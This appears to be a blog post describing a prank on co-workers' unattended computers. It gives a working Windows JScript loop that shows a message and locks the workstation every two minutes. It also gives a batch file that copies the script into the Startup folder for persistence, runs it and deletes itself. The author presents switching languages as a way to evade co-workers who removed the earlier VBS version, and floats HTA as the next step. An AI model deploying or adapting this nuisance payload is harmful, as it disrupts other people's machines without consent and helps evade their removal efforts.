Fun with Unattended Workstations Part II

So my co-workers have figured it out that it was a VB Script file. They were able to stop the script by searching .VBS files on the system and then deleting suspicious VBS files. This motivated me to write script in another language so this time I have come up with Windows JS and the script goes like this…..

for (var i=0;;i++)
{
var aj= new ActiveXObject("WScript.shell");
aj.run("msg * /V /W 'AJ is watching you !' ")
WScript.sleep(2000)
aj.run("rundll32 user32.dll, LockWorkStation")
WScript.sleep(120000)
}

Infinite FOR loop and then running ActiveXObject for .run and .sleep methods. I also wanted to copy this Windows JS file to start-up but was unable to achieve it running within the script. so BAT script came to my rescue.

@Echo Off
copy "start.js" "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
call start.js
del AJ.bat

The BAT script will copy the Windows JS file to the startup , run the JS file and then auto delete the BAT file.

Quick Thoughts: what if they are able to find out this Window JS file as well, not to worry HTA would help us out (Comment if you any other interesting methods/ways). Hope this post was interesting, keep watching this blog for more interesting posts.
Feel free to Comment,Share and Subscribe.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s